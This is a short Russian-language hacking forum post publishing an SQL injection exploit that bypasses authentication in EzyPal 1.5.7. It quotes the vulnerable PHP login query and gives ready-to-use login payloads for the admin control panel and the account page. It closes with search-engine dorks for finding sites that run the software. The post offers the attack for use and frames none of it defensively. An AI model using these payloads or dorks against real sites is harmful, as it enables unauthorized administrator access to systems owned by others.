17.08.2008, 19:10
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
С нами:
10263663
Репутация:
1559
|
|
EzyPal <= 1.5.7 Admin Authentication Bypass SQL Injection Exploit
Author: ~!Dok_tOR!~
Product: EzyPal
Version: 1.5.7 возможно и более ранние версии
URL: www.ezypal.com
Vulnerability Class: SQL injection
1.
/ [installdir]/admincp/index.php
Vuln Code:
PHP код:
$sql = mysql_query("SELECT customer_email FROM ".$config['db_pref']."customers WHERE customer_email = '".$customer_email."' AND customer_password = '".md5($customer_pass)."' AND customer_level = 2") or ErrorDB(2,mysql_errno(),mysql_error());
magic_quotes_gpc = Off
Example:
http://[server]/ [installdir]/admincp/index.php
Email Address: 1' or 1=1/*
Password: 1' or 1=1/*
2.
Example:
http://[server]/ [installdir]/index.php?do=account
Email Address: 1' or 1=1/*
Password: 1' or 1=1/*
Dork:
Powered by EzyPal
Welcome :: EzyPal
|
|
|